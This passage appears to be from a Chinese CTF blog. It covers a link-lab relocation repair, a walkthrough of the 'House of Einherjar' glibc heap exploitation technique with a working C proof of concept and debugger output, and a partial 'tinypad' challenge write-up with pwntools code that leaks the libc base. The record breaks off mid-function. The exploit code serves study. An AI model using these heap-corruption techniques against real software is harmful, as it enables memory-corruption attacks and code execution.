可以发现一个规律，对应 ‘.rel.text’ 表中：

第一个4字节空间是偏移量
第二个4字节空间是信息（注意小端字节序）

在“0x6e8”和“0x6e8+0x4”的位置是空的，’.rel.text’ 表中空着的地方都没有数据，通过前面几个实验的观察，’.rel.text’ 表是不应该存在空数据的，所以实验五的核心就是为了把 ‘.rel.text’ 表补全

那么填入什么数据呢，需要在汇编中查看：

➜  [/home/ywhkkx/ex1.linklab/l5] objdump -d phase5.o

phase5.o：     文件格式 elf32-i386


Disassembly of section .text:

00000000 <transform_code>:
   0:	55                   	push   %ebp
   1:	89 e5                	mov    %esp,%ebp
   3:	e8 fc ff ff ff       	call   4 <transform_code+0x4> // target 0x4
   8:	05 01 00 00 00       	add    $0x1,%eax // _GLOBAL_OFFSET_TABLE_
   d:	8b 55 0c             	mov    0xc(%ebp),%edx
  10:	8b 94 90 00 00 00 00 	mov    0x0(%eax,%edx,4),%edx // CmhNnM
  17:	83 e2 07             	and    $0x7,%edx
  1a:	83 fa 07             	cmp    $0x7,%edx
  1d:	77 68                	ja     87 <.L2>
  1f:	c1 e2 02             	shl    $0x2,%edx
  22:	8b 94 02 c0 00 00 00 	mov    0xc0(%edx,%eax,1),%edx // target 0x25
  29:	01 c2                	add    %eax,%edx
  2b:	ff e2                	jmp    *%edx

0000002d <.L3>:
  2d:	f7 55 08             	notl   0x8(%ebp)
  30:	eb 59                	jmp    8b <.L2+0x4>

00000032 <.L5>:
  32:	8b 55 0c             	mov    0xc(%ebp),%edx
  35:	8b 84 90 00 00 00 00 	mov    0x0(%eax,%edx,4),%eax // target 0x38
  3c:	83 e0 03             	and    $0x3,%eax
  3f:	89 c1                	mov    %eax,%ecx
  41:	d3 7d 08             	sarl   %cl,0x8(%ebp)
  44:	eb 45                	jmp    8b <.L2+0x4>

00000046 <.L6>:
  46:	8b 55 0c             	mov    0xc(%ebp),%edx
  49:	8b 84 90 00 00 00 00 	mov    0x0(%eax,%edx,4),%eax // CmhNnM
  50:	f7 d0                	not    %eax
  52:	21 45 08             	and    %eax,0x8(%ebp)
  55:	eb 34                	jmp    8b <.L2+0x4>

00000057 <.L7>:
  57:	8b 55 0c             	mov    0xc(%ebp),%edx
  5a:	8b 84 90 00 00 00 00 	mov    0x0(%eax,%edx,4),%eax // CmhNnM
  61:	c1 e0 08             	shl    $0x8,%eax
  64:	09 45 08             	or     %eax,0x8(%ebp)
  67:	eb 22                	jmp    8b <.L2+0x4>

00000069 <.L8>:
  69:	8b 55 0c             	mov    0xc(%ebp),%edx
  6c:	8b 84 90 00 00 00 00 	mov    0x0(%eax,%edx,4),%eax // target 0x6f
  73:	31 45 08             	xor    %eax,0x8(%ebp)
  76:	eb 13                	jmp    8b <.L2+0x4>

00000078 <.L9>:
  78:	8b 55 0c             	mov    0xc(%ebp),%edx
  7b:	8b 84 90 00 00 00 00 	mov    0x0(%eax,%edx,4),%eax // CmhNnM
  82:	89 45 08             	mov    %eax,0x8(%ebp)
  85:	eb 04                	jmp    8b <.L2+0x4>

00000087 <.L2>:
  87:	f7 5d 08             	negl   0x8(%ebp)
  8a:	90                   	nop
  8b:	8b 45 08             	mov    0x8(%ebp),%eax
  8e:	5d                   	pop    %ebp
  8f:	c3                   	ret    

00000090 <generate_code>:
  90:	55                   	push   %ebp
  91:	89 e5                	mov    %esp,%ebp
  93:	53                   	push   %ebx
  94:	83 ec 10             	sub    $0x10,%esp
  97:	e8 fc ff ff ff       	call   98 <generate_code+0x8> // target 0x98
  9c:	81 c3 02 00 00 00    	add    $0x2,%ebx // _GLOBAL_OFFSET_TABLE_
  a2:	8b 45 08             	mov    0x8(%ebp),%eax
  a5:	88 83 00 00 00 00    	mov    %al,0x0(%ebx) // CODE
  ab:	c7 45 f8 00 00 00 00 	movl   $0x0,-0x8(%ebp) // target 0xae
  b2:	eb 20                	jmp    d4 <generate_code+0x44>
  b4:	0f b6 83 00 00 00 00 	movzbl 0x0(%ebx),%eax // target 0xb7
  bb:	0f be c0             	movsbl %al,%eax
  be:	ff 75 f8             	pushl  -0x8(%ebp)
  c1:	50                   	push   %eax
  c2:	e8 fc ff ff ff       	call   c3 <generate_code+0x33>
  c7:	83 c4 08             	add    $0x8,%esp
  ca:	88 83 00 00 00 00    	mov    %al,0x0(%ebx) // CODE
  d0:	83 45 f8 01          	addl   $0x1,-0x8(%ebp)
  d4:	8b 45 f8             	mov    -0x8(%ebp),%eax
  d7:	83 f8 08             	cmp    $0x8,%eax
  da:	76 d8                	jbe    b4 <generate_code+0x24>
  dc:	90                   	nop
  dd:	8b 5d fc             	mov    -0x4(%ebp),%ebx
  e0:	c9                   	leave  
  e1:	c3                   	ret    

000000e2 <encode>:
  e2:	55                   	push   %ebp
  e3:	89 e5                	mov    %esp,%ebp
  e5:	53                   	push   %ebx
  e6:	83 ec 14             	sub    $0x14,%esp
  e9:	e8 fc ff ff ff       	call   ea <encode+0x8> // __x86.get_pc_thunk.bx
  ee:	81 c3 02 00 00 00    	add    $0x2,%ebx // target 0xf0
  f4:	83 ec 0c             	sub    $0xc,%esp
  f7:	ff 75 08             	pushl  0x8(%ebp)
  fa:	e8 fc ff ff ff       	call   fb <encode+0x19> // strlen
  ff:	83 c4 10             	add    $0x10,%esp
 102:	89 45 f4             	mov    %eax,-0xc(%ebp)
 105:	c7 45 f0 00 00 00 00 	movl   $0x0,-0x10(%ebp) 
 10c:	eb 5d                	jmp    16b <encode+0x89>
 10e:	8b 55 f0             	mov    -0x10(%ebp),%edx
 111:	8b 45 08             	mov    0x8(%ebp),%eax
 114:	01 d0                	add    %edx,%eax
 116:	0f b6 00             	movzbl (%eax),%eax
 119:	0f be c0             	movsbl %al,%eax
 11c:	0f b6 94 03 00 00 00 	movzbl 0x0(%ebx,%eax,1),%edx // cRvFVR
 123:	00 
 124:	0f b6 83 00 00 00 00 	movzbl 0x0(%ebx),%eax // CODE
 12b:	89 d1                	mov    %edx,%ecx
 12d:	31 c1                	xor    %eax,%ecx
 12f:	8b 55 f0             	mov    -0x10(%ebp),%edx
 132:	8b 45 08             	mov    0x8(%ebp),%eax
 135:	01 d0                	add    %edx,%eax
 137:	83 e1 7f             	and    $0x7f,%ecx
 13a:	89 ca                	mov    %ecx,%edx
 13c:	88 10                	mov    %dl,(%eax)
 13e:	8b 55 f0             	mov    -0x10(%ebp),%edx
 141:	8b 45 08             	mov    0x8(%ebp),%eax
 144:	01 d0                	add    %edx,%eax
 146:	0f b6 00             	movzbl (%eax),%eax
 149:	3c 1f                	cmp    $0x1f,%al
 14b:	7e 0f                	jle    15c <encode+0x7a>
 14d:	8b 55 f0             	mov    -0x10(%ebp),%edx
 150:	8b 45 08             	mov    0x8(%ebp),%eax
 153:	01 d0                	add    %edx,%eax
 155:	0f b6 00             	movzbl (%eax),%eax
 158:	3c 7f                	cmp    $0x7f,%al
 15a:	75 0b                	jne    167 <encode+0x85>
 15c:	8b 55 f0             	mov    -0x10(%ebp),%edx
 15f:	8b 45 08             	mov    0x8(%ebp),%eax
 162:	01 d0                	add    %edx,%eax
 164:	c6 00 20             	movb   $0x20,(%eax)
 167:	83 45 f0 01          	addl   $0x1,-0x10(%ebp)
 16b:	8b 45 f0             	mov    -0x10(%ebp),%eax
 16e:	3b 45 f4             	cmp    -0xc(%ebp),%eax
 171:	7c 9b                	jl     10e <encode+0x2c>
 173:	8b 45 f4             	mov    -0xc(%ebp),%eax
 176:	8b 5d fc             	mov    -0x4(%ebp),%ebx
 179:	c9                   	leave  
 17a:	c3                   	ret    

0000017b <do_phase>:
 17b:	55                   	push   %ebp
 17c:	89 e5                	mov    %esp,%ebp
 17e:	53                   	push   %ebx
 17f:	83 ec 04             	sub    $0x4,%esp
 182:	e8 fc ff ff ff       	call   183 <do_phase+0x8> // target 0x183
 187:	81 c3 02 00 00 00    	add    $0x2,%ebx // _GLOBAL_OFFSET_TABLE_
 18d:	68 87 00 00 00       	push   $0x87
 192:	e8 fc ff ff ff       	call   193 <do_phase+0x18> // generate_code
 197:	83 c4 04             	add    $0x4,%esp
 19a:	83 ec 0c             	sub    $0xc,%esp
 19d:	8d 83 00 00 00 00    	lea    0x0(%ebx),%eax // BUF
 1a3:	50                   	push   %eax
 1a4:	e8 fc ff ff ff       	call   1a5 <do_phase+0x2a> // encode
 1a9:	83 c4 10             	add    $0x10,%esp
 1ac:	83 ec 0c             	sub    $0xc,%esp
 1af:	8d 83 00 00 00 00    	lea    0x0(%ebx),%eax // BUF
 1b5:	50                   	push   %eax
 1b6:	e8 fc ff ff ff       	call   1b7 <do_phase+0x3c> // puts
 1bb:	83 c4 10             	add    $0x10,%esp
 1be:	90                   	nop
 1bf:	8b 5d fc             	mov    -0x4(%ebp),%ebx
 1c2:	c9                   	leave  
 1c3:	c3                   	ret    

Disassembly of section .text.__x86.get_pc_thunk.ax:

00000000 <__x86.get_pc_thunk.ax>:
   0:	8b 04 24             	mov    (%esp),%eax
   3:	c3                   	ret    

Disassembly of section .text.__x86.get_pc_thunk.bx:

00000000 <__x86.get_pc_thunk.bx>:
   0:	8b 1c 24             	mov    (%esp),%ebx
   3:	c3                   	ret

主要看 “00 00 00” 和 “ff ff ff” 有没有在 ‘.rel.text’ 表中出现，把出现的标记，没有的可能就是需要修补的，最后进行修改：

➜  [/home/ywhkkx/ex1.linklab/l5] readelf -r phase5.o             

重定位节 '.rel.text' at offset 0x6e8 contains 27 entries:
 偏移量     信息    类型              符号值      符号名称
00000004  00001d02 R_386_PC32        00000000   __x86.get_pc_thunk.bx
00000009  00001b0a R_386_GOTPC       00000000   _GLOBAL_OFFSET_TABLE_
00000013  00001d02 R_386_PC32        00000000   __x86.get_pc_thunk.bx
00000025  00001b0a R_386_GOTPC       00000000   _GLOBAL_OFFSET_TABLE_
00000038  00001509 R_386_GOTOFF      00000000   CmhNnM
0000004c  00001509 R_386_GOTOFF      00000000   CmhNnM
0000005d  00001509 R_386_GOTOFF      00000000   CmhNnM
0000006f  00001509 R_386_GOTOFF      00000000   CmhNnM
0000007e  00001509 R_386_GOTOFF      00000000   CmhNnM
00000098  00001d02 R_386_PC32        00000000   __x86.get_pc_thunk.bx
0000009e  00001b0a R_386_GOTPC       00000000   _GLOBAL_OFFSET_TABLE_
000000a7  00001809 R_386_GOTOFF      0000000b   CODE
000000ae  00001809 R_386_GOTOFF      0000000b   CODE
000000b7  00001809 R_386_GOTOFF      0000000b   CODE
000000cc  00001809 R_386_GOTOFF      0000000b   CODE
000000ea  00001d02 R_386_PC32        00000000   __x86.get_pc_thunk.bx
000000f0  00001b0a R_386_GOTPC       00000000   _GLOBAL_OFFSET_TABLE_
000000fb  00001f04 R_386_PLT32       00000000   strlen
00000120  00001609 R_386_GOTOFF      00000040   cRvFVR
00000127  00001809 R_386_GOTOFF      0000000b   CODE
00000183  00001d02 R_386_PC32        00000000   __x86.get_pc_thunk.bx
00000189  00001b0a R_386_GOTPC       00000000   _GLOBAL_OFFSET_TABLE_
00000193  00001c02 R_386_PC32        00000090   generate_code
0000019f  00001709 R_386_GOTOFF      00000000   BUF
000001a5  00001e02 R_386_PC32        000000e2   encode
000001b1  00001709 R_386_GOTOFF      00000000   BUF
000001b7  00002104 R_386_PLT32       00000000   puts

“偏移量”很好处理，就是“信息”不好选择，我是根据“汇编代码的相似性”进行选择的，最后总算可以输出了（想要完美完成这个实验，必须掌握汇编）

1 2	➜ [/home/ywhkkx/ex1.linklab/l5] ./linkbomb5 PP$;`;;``;

没有段错误了，但是输出很奇怪（有些地方没有改好）

收获

以前就对 link 有困惑，做了这个实验感受了一下 link 的过程后，发现自己对 link 的理解更清晰了
学习到了 objdump，readelf，hexedit 等工具的用法
看到了各个节在二进制文件的分布，学会了用“节偏移”和“节内偏移”来寻找需要的数据

House Of Einherjar-原理

Posted on 2022-03-08 In HouseOfSeries 5.1k 5 mins.

House Of Einherjar

house of einherjar 跟 house of force 差不多，最终目的都是控制 top chunk 的值

该技术可以强制使得malloc返回一个几乎任意地址的 chunk

House Of Einherjar 利用姿势

伪造一个 chunk，计算最后一个 chunk 到我们伪造 chunk 的距离，设置为最后一个 chunk 的 pre_size 位，当 free 最后一个 chunk 时，会将伪造的 chunk 和当前 chunk 和 top chunk 进行 unlink 操作，合并成一个 top chunk，从而达到将 top chunk 设置到我们伪造 chunk 的地址

// 和 house of force 不同，想要控制目标区域的 offset（fake_presize）通常为正

通过 off-by-one 把最后一个 chunk 的 pre_inuse 标志位置零，让 free 函数以为上一个 chunk 已经被 free，这就要求了最后一个 chunk 的 size 必须大于 0x100，要不然会在 top chunk 进行合并操作的时候失败（指被覆盖为“\x00”）

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <malloc.h>

int main()
{
    setbuf(stdin, NULL);
    setbuf(stdout, NULL);

    uint8_t* a;
    uint8_t* b;
    uint8_t* d;

    a = (uint8_t*)malloc(0x38);
    printf("a: %p\n", a);

    int real_a_size = malloc_usable_size(a);
    printf("Since we want to overflow 'a', we need the 'real' size of 'a' after rounding:%#x\n", real_a_size);

    size_t fake_chunk[6];

    fake_chunk[0] = 0x100;
    fake_chunk[1] = 0x100;
    fake_chunk[2] = (size_t)fake_chunk;
    fake_chunk[3] = (size_t)fake_chunk;
    fake_chunk[4] = (size_t)fake_chunk;
    fake_chunk[5] = (size_t)fake_chunk;
    printf("Our fake chunk at %p looks like:\n", fake_chunk);

    b = (uint8_t*)malloc(0xf8);
    int real_b_size = malloc_usable_size(b);
    printf("b: %p\n", b);

    uint64_t* b_size_ptr = (uint64_t*)(b - 8);
    printf("\nb.size: %#lx\n", *b_size_ptr); // 覆盖前:b.size = 0x101(0xf8+0x8+1)
    a[real_a_size] = 0; // 写入chunkB->size(chunkB->presize也属于chunkA的数据区)
    printf("b.size: %#lx\n", *b_size_ptr); // 覆盖后:b.size = 0x100(覆盖了末尾的1)

    size_t fake_size = (size_t)((b - sizeof(size_t) * 2) - (uint8_t*)fake_chunk);
    printf("Our fake prev_size will be %p - %p = %#lx\n", b - sizeof(size_t) * 2, fake_chunk, fake_size);
    *(size_t*)&a[real_a_size - sizeof(size_t)] = fake_size; // 修改chunkB->presize

    fake_chunk[1] = fake_size;

    free(b); // 释放chunkB,topchunk将会被控制到“&fake_chunk”
    printf("Our fake chunk size is now %#lx (b.size + fake_prev_size)\n", fake_chunk[1]);

    d = malloc(0x200); 
    printf("Next malloc(0x200) is at %p\n", d); // 打印fake_chunk的数据区地址
}

覆盖前：

pwndbg> x/20xg 0x55555555b000
0x55555555b000:	0x0000000000000000	0x0000000000000041
0x55555555b010:	0x0000000000000000	0x0000000000000000
0x55555555b020:	0x0000000000000000	0x0000000000000000
0x55555555b030:	0x0000000000000000	0x0000000000000000
0x55555555b040:	0x0000000000000000	0x0000000000000101
0x55555555b050:	0x0000000000000000	0x0000000000000000

覆盖后：（ a[real_a_size] = 0 ）

pwndbg> x/20xg 0x55555555b000
0x55555555b000:	0x0000000000000000	0x0000000000000041
0x55555555b010:	0x0000000000000000	0x0000000000000000
0x55555555b020:	0x0000000000000000	0x0000000000000000
0x55555555b030:	0x0000000000000000	0x0000000000000000
0x55555555b040:	0x0000000000000000	0x0000000000000100
0x55555555b050:	0x0000000000000000	0x0000000000000000

修改后：（ (size_t)&a[real_a_size - sizeof(size_t)] = fake_size ）

pwndbg> x/20xg 0x55555555b000
0x55555555b000:	0x0000000000000000	0x0000000000000041
0x55555555b010:	0x0000000000000000	0x0000000000000000
0x55555555b020:	0x0000000000000000	0x0000000000000000
0x55555555b030:	0x0000000000000000	0x0000000000000000
0x55555555b040:	0xffffd5555555d2f0	0x0000000000000100
0x55555555b050:	0x0000000000000000	0x0000000000000000

释放后：（ free(b) ）

pwndbg> heap
Allocated chunk
Addr: 0x7ffffffde010 /* GDB显示有误(控制了topchunk之后,GDB就显示不准确了) */
Size: 0x00

结果：（显示的地址和上述GDB调试的地址不同，因为这是两个不同的进程）

➜  [/home/ywhkkx/桌面] ./test
a: 0x560df0294010
Since we want to overflow 'a', we need the 'real' size of 'a' after rounding:0x38
Our fake chunk at 0x7ffcea6130c0 looks like:
b: 0x560df0294050

b.size: 0x101
b.size: 0x100
Our fake prev_size will be 0x560df0294040 - 0x7ffcea6130c0 = 0xffffd61105c80f80
Our fake chunk size is now 0xffffd61105ca1f41 (b.size + fake_prev_size)
Next malloc(0x200) is at 0x7ffcea6130d0 // 申请到了0x7ffcea6130c0的数据区

总而言之，利用手段为：

已有两个 chunk（最后一个chunk，和倒数第二个chunk），释放倒数第二个 chunk
重新把倒数第二个 chunk 申请回来，在最后一个内存空间（lastchunk->presize）的位置写入 offset（可以索引到 fakechunk），同时溢出“\x00”覆盖 lastchunk 的P位（lastchunk->size）
提前在 fakechunk 处伪造好数据：presize（offset），size，FD，BK，FDsize，BKsize
释放 lastchunk

向后合并机制与利用点

下面是 libc-2.23 中，向后合并的源码：

1	#define chunk_at_offset(p, s) BOUNDED_1((mchunkptr)(((char*)(p)) + (s)))

if (!(hd & PREV_INUSE))                    /* consolidate backward */
{ 
  prevsz = p->prev_size; 
    /* 记录相邻堆块p的prev_size值 */
  p = chunk_at_offset(p, -(long)prevsz); 
    /* 堆块p的指针最后由chunk_at_offset()函数决定 */
    /* 将原本p指针位置加上s偏移后的位置作为合并堆块的新指针(向上增加) */
  sz += prevsz; 
    /* size = size + prev_size */

  if (p->fd == last_remainder(ar_ptr))     /* keep as last_remainder */
    islr = 1;
  else
    unlink(p, bck, fwd);
    /* 检查并脱链 */
}

可以看到执行 set_head() 函数后，合并堆块的 size 会变为两个堆块的总和，并且 top_chunk 的指针会指向被合并的堆块 p 的位置，就相当于 top_chunk 把 p 给吞了，并取代了 p 的位置

可以发现程序并没有对 向后合并 进行过多的检查，不管 presize 是多少都是合理的

保护检查：后向合并中没有多少检查，但是unlink操作会先检查 “fakechunk->size” （必须可以通过 size 索引到“last chunk”，并且P位为“0”，这样才会进行 unlink），因为“fake_size”（offset）很大，fake chunk 会被当做是 large chunk ，所以还会格外检查 FD，BK，FDsize，BKsize

破解办法：控制“fake chunk”，写入“fake_size”，在“FD，BK，FDsize，BKsize”中写入“fake chunk addr”就可以通过检查（至少在 libc-2.23 是这样的）

利用条件：

用户能够篡改 top chunk 的 presize 字段（篡改为负数或很大值）
有 off-by-one ，可以覆盖最后一个chunk的P位为“\x00”（使其在和 top chunk 合并后还可以进行后向合并，通过“chunk->presize”索引到“fake chunk”把 top chunk 合并到“fake chunk”上）
可以控制“fake chunk”

版本对 House Of Einherjar 的影响

libc-2.23

基本没有影响，可以直接打

House Of Einherjar-2.23-64

Posted on 2022-03-08 Edited on 2022-11-10 In Pwn train 18k 16 mins.

tinypad

➜  [/home/ywhkkx/桌面] ./tinypad 

  ============================================================================
// _|_|_|_|_|  _|_|_|  _|      _|  _|      _|  _|_|_|      _|_|    _|_|_|     \\
||     _|        _|    _|_|    _|    _|  _|    _|    _|  _|    _|  _|    _|   ||
||     _|        _|    _|  _|  _|      _|      _|_|_|    _|_|_|_|  _|    _|   ||
||     _|        _|    _|    _|_|      _|      _|        _|    _|  _|    _|   ||
\\     _|      _|_|_|  _|      _|      _|      _|        _|    _|  _|_|_|     //
  ============================================================================

+------------------------------------------------------------------------------+

 #   INDEX: 1
 # CONTENT: 

+------------------------------------------------------------------------------+

 #   INDEX: 2
 # CONTENT: 

+------------------------------------------------------------------------------+

 #   INDEX: 3
 # CONTENT: 

+------------------------------------------------------------------------------+

 #   INDEX: 4
 # CONTENT: 

+- MENU -----------------------------------------------------------------------+
| [A] Add memo                                                                 |
| [D] Delete memo                                                              |
| [E] Edit memo                                                                |
| [Q] Quit                                                                     |
+------------------------------------------------------------------------------+
(CMD)>>>

tinypad: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=1333a912c440e714599a86192a918178f187d378, not stripped

[*] '/home/ywhkkx/桌面/tinypad'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

64位，Full RELRO，开了cancay，开了NX

int __cdecl main(int argc, const char **argv, const char **envp)
{
  __int64 v3; // rax
  int choice; // eax
  int v5; // eax
  __int64 len; // rax
  unsigned __int64 len_data; // rax
  int c; // [rsp+4h] [rbp-1Ch] BYREF
  int i; // [rsp+8h] [rbp-18h]
  int index; // [rsp+Ch] [rbp-14h]
  int v12; // [rsp+10h] [rbp-10h]
  int size; // [rsp+14h] [rbp-Ch]
  unsigned __int64 v14; // [rsp+18h] [rbp-8h]

  v14 = __readfsqword(0x28u);
  v12 = 0;
  write_n((__int64)&leak_addr, 1uLL);
  write_n(
    (__int64)"  ============================================================================\n"
             "// _|_|_|_|_|  _|_|_|  _|      _|  _|      _|  _|_|_|      _|_|    _|_|_|     \\\\\n"
             "||     _|        _|    _|_|    _|    _|  _|    _|    _|  _|    _|  _|    _|   ||\n"
             "||     _|        _|    _|  _|  _|      _|      _|_|_|    _|_|_|_|  _|    _|   ||\n"
             "||     _|        _|    _|    _|_|      _|      _|        _|    _|  _|    _|   ||\n"
             "\\\\     _|      _|_|_|  _|      _|      _|      _|        _|    _|  _|_|_|     //\n"
             "  ============================================================================\n",
    0x233uLL);
  write_n((__int64)&leak_addr, 1uLL);
  do
  {
    for ( i = 0; i <= 3; ++i )
    {
      LOBYTE(c) = i + 49;                       // ASCII:1,2,3,4
      writeln((__int64)"+------------------------------------------------------------------------------+\n", 81LL);
      write_n((__int64)" #   INDEX: ", 0xCuLL);
      writeln((__int64)&c, 1LL);
      write_n((__int64)" # CONTENT: ", 0xCuLL);
      if ( *(_QWORD *)&chunk_list[16 * i + 264] )
      {
        v3 = strlen(*(const char **)&chunk_list[16 * i + 264]);
        writeln(*(_QWORD *)&chunk_list[16 * i + 264], v3);
      }
      writeln((__int64)&leak_addr, 1LL);
    }
    index = 0;
    choice = getcmd();
    v12 = choice;
    if ( choice == 'D' )                        // Delete memo 
    {
      write_n((__int64)"(INDEX)>>> ", 0xBuLL);
      index = read_int();
      if ( index <= 0 || index > 4 )            // index范围是:1,2,3
      {
LABEL_29:
        writeln((__int64)"Invalid index", 13LL);
        continue;
      }
      if ( !*(_QWORD *)&chunk_list[16 * index + 240] )
      {
LABEL_31:
        writeln((__int64)"Not used", 8LL);
        continue;
      }
      free(*(void **)&chunk_list[16 * index + 248]);
      *(_QWORD *)&chunk_list[16 * index + 240] = 0LL;// 置空了size,没有置空指针
      writeln((__int64)"\nDeleted.", 9LL);
    }
    else if ( choice > 'D' )
    {
      if ( choice != 'E' )
      {
        if ( choice == 'Q' )
          continue;
LABEL_41:
        writeln((__int64)"No such a command", 17LL);
        continue;
      }
      write_n((__int64)"(INDEX)>>> ", 0xBuLL);  // Edit memo         
      index = read_int();
      if ( index <= 0 || index > 4 )
        goto LABEL_29;
      if ( !*(_QWORD *)&chunk_list[16 * index + 240] )
        goto LABEL_31;
      c = 48;
      strcpy(chunk_list, *(const char **)&chunk_list[16 * index + 248]);// 把数据复制到chunk_list首位
      while ( toupper(c) != 'Y' )               // 只要不Y就可以一直修改
      {
        write_n((__int64)"CONTENT: ", 9uLL);    // 输出数据，也许可以利用这里来leak
        len = strlen(chunk_list);
        writeln((__int64)chunk_list, len);
        write_n((__int64)"(CONTENT)>>> ", 0xDuLL);
        len_data = strlen(*(const char **)&chunk_list[16 * index + 248]);
        read_until((__int64)chunk_list, len_data, 0xAu);
        writeln((__int64)"Is it OK?", 9LL);
        write_n((__int64)"(Y/n)>>> ", 9uLL);
        read_until((__int64)&c, 1uLL, 0xAu);
      }
      strcpy(*(char **)&chunk_list[16 * index + 248], chunk_list);// 复制回去
      writeln((__int64)"\nEdited.", 8LL);
    }
    else
    {
      if ( choice != 65 )                       // Add memo 
        goto LABEL_41;
      while ( index <= 3 && *(_QWORD *)&chunk_list[16 * index + 256] )// 只要chunk_list中有数据，它就跳过
        ++index;
      if ( index == 4 )
      {
        writeln((__int64)"No space is left.", 17LL);
      }
      else
      {
        size = -1;
        write_n((__int64)"(SIZE)>>> ", 0xAuLL);
        size = read_int();
        if ( size <= 0 )                        // size不能为负
        {
          v5 = 1;
        }
        else
        {
          v5 = size;
          if ( (unsigned __int64)size > 0x100 ) // size不能超过0x100
            v5 = 256;
        }
        size = v5;
        *(_QWORD *)&chunk_list[16 * index + 256] = v5;
        *(_QWORD *)&chunk_list[16 * index + 264] = malloc(size);// malloc
        if ( !*(_QWORD *)&chunk_list[16 * index + 264] )
        {
          writerrln("[!] No memory is available.", 27LL);
          exit(-1);
        }
        write_n((__int64)"(CONTENT)>>> ", 0xDuLL);
        read_until(*(_QWORD *)&chunk_list[16 * index + 264], size, 0xAu);// 写入内容
        writeln((__int64)"\nAdded.", 7LL);
      }
    }
  }
  while ( v12 != 81 );                          // quit
  return 0;
}

代码量很大，而且很杂

入侵思路

这个程序的释放模块有很明显的漏洞：

1 2	free((void )&chunk_list[16 index + 248]); (_QWORD )&chunk_list[16 * index + 240] = 0LL;

发现程序置空了 size ，却没有置空指针，可以打 unsortedbin leak

add(0xe0, "A"*0xe0)
add(0xf0, "B"*0xf0)
add(0x100, "C"*0x100)
add(0x100, "D"*0x100) # 因为后面"chunk4->size"会被覆盖低位,所以这里只能为0x100
delete(3) # 注意:这里要先释放后申请的chunk,不然程序不会打印(不知道原因)
delete(1)

pwndbg> x/20xg 0x19a4000 
0x19a4000:	0x0000000000000000	0x00000000000000f1 // chunk1(free)
0x19a4010:	0x00000000019a41f0	0x00007f763bf5db78
0x19a4020:	0x4141414141414141	0x4141414141414141
0x19a4030:	0x4141414141414141	0x4141414141414141
0x19a4040:	0x4141414141414141	0x4141414141414141
0x19a4050:	0x4141414141414141	0x4141414141414141
0x19a4060:	0x4141414141414141	0x4141414141414141
0x19a4070:	0x4141414141414141	0x4141414141414141
0x19a4080:	0x4141414141414141	0x4141414141414141
0x19a4090:	0x4141414141414141	0x4141414141414141
0x19a40a0:	0x4141414141414141	0x4141414141414141
0x19a40b0:	0x4141414141414141	0x4141414141414141
0x19a40c0:	0x4141414141414141	0x4141414141414141
0x19a40d0:	0x4141414141414141	0x4141414141414141
0x19a40e0:	0x4141414141414141	0x4141414141414141
0x19a40f0:	0x00000000000000f0	0x0000000000000100 // chunk2(allocated)
0x19a4100:	0x4242424242424242	0x4242424242424242
0x19a4110:	0x4242424242424242	0x4242424242424242
0x19a4120:	0x4242424242424242	0x4242424242424242
0x19a4130:	0x4242424242424242	0x4242424242424242
0x19a4140:	0x4242424242424242	0x4242424242424242
0x19a4150:	0x4242424242424242	0x4242424242424242
0x19a4160:	0x4242424242424242	0x4242424242424242
0x19a4170:	0x4242424242424242	0x4242424242424242
0x19a4180:	0x4242424242424242	0x4242424242424242
0x19a4190:	0x4242424242424242	0x4242424242424242
0x19a41a0:	0x4242424242424242	0x4242424242424242
0x19a41b0:	0x4242424242424242	0x4242424242424242
0x19a41c0:	0x4242424242424242	0x4242424242424242
0x19a41d0:	0x4242424242424242	0x4242424242424242
0x19a41e0:	0x4242424242424242	0x4242424242424242
0x19a41f0:	0x0000000000000000	0x0000000000000111 // chunk3(free)
0x19a4200:	0x00007f763bf5db78	0x00000000019a4000
0x19a4210:	0x4343434343434343	0x4343434343434343
0x19a4220:	0x4343434343434343	0x4343434343434343
0x19a4230:	0x4343434343434343	0x4343434343434343
0x19a4240:	0x4343434343434343	0x4343434343434343
0x19a4250:	0x4343434343434343	0x4343434343434343
0x19a4260:	0x4343434343434343	0x4343434343434343
0x19a4270:	0x4343434343434343	0x4343434343434343
0x19a4280:	0x4343434343434343	0x4343434343434343
0x19a4290:	0x4343434343434343	0x4343434343434343
0x19a42a0:	0x4343434343434343	0x4343434343434343
0x19a42b0:	0x4343434343434343	0x4343434343434343
0x19a42c0:	0x4343434343434343	0x4343434343434343
0x19a42d0:	0x4343434343434343	0x4343434343434343
0x19a42e0:	0x4343434343434343	0x4343434343434343
0x19a42f0:	0x4343434343434343	0x4343434343434343
0x19a4300:	0x0000000000000110	0x0000000000000110 // chunk4(allocated)
0x19a4310:	0x4444444444444444	0x4444444444444444
0x19a4320:	0x4444444444444444	0x4444444444444444
0x19a4330:	0x4444444444444444	0x4444444444444444
0x19a4340:	0x4444444444444444	0x4444444444444444
0x19a4350:	0x4444444444444444	0x4444444444444444
0x19a4360:	0x4444444444444444	0x4444444444444444
0x19a4370:	0x4444444444444444	0x4444444444444444
0x19a4380:	0x4444444444444444	0x4444444444444444
0x19a4390:	0x4444444444444444	0x4444444444444444
0x19a43a0:	0x4444444444444444	0x4444444444444444
0x19a43b0:	0x4444444444444444	0x4444444444444444
0x19a43c0:	0x4444444444444444	0x4444444444444444
0x19a43d0:	0x4444444444444444	0x4444444444444444
0x19a43e0:	0x4444444444444444	0x4444444444444444
0x19a43f0:	0x4444444444444444	0x4444444444444444
0x19a4400:	0x4444444444444444	0x4444444444444444
0x19a4410:	0x0000000000000000	0x0000000000020bf1

可以获取 libc_base 和 heap_addr 了：

p.recvuntil('NDEX: 3\n')
p.recvuntil('# CONTENT: ')
leak_addr=u64(p.recvuntil('\n')[:-1].ljust(8,'\x00'))
libc_base=leak_addr-0x3c4b78
success('leak_addr >> '+hex(leak_addr))
success('libc_base >> '+hex(libc_base))

程序还有一个漏洞：

unsigned __int64 __fastcall read_until(__int64 a1, unsigned __int64 size, unsigned int xa)
{
  unsigned __int64 i; // [rsp+28h] [rbp-18h]
  signed __int64 n; // [rsp+30h] [rbp-10h]

  for ( i = 0LL; i < size; ++i )
  {
    n = read_n(0, (__int64 *)(a1 + i), 1uLL);
    if ( n < 0 )
      return -1LL;
    if ( !n || *(char *)(a1 + i) == xa )
      break;
  }
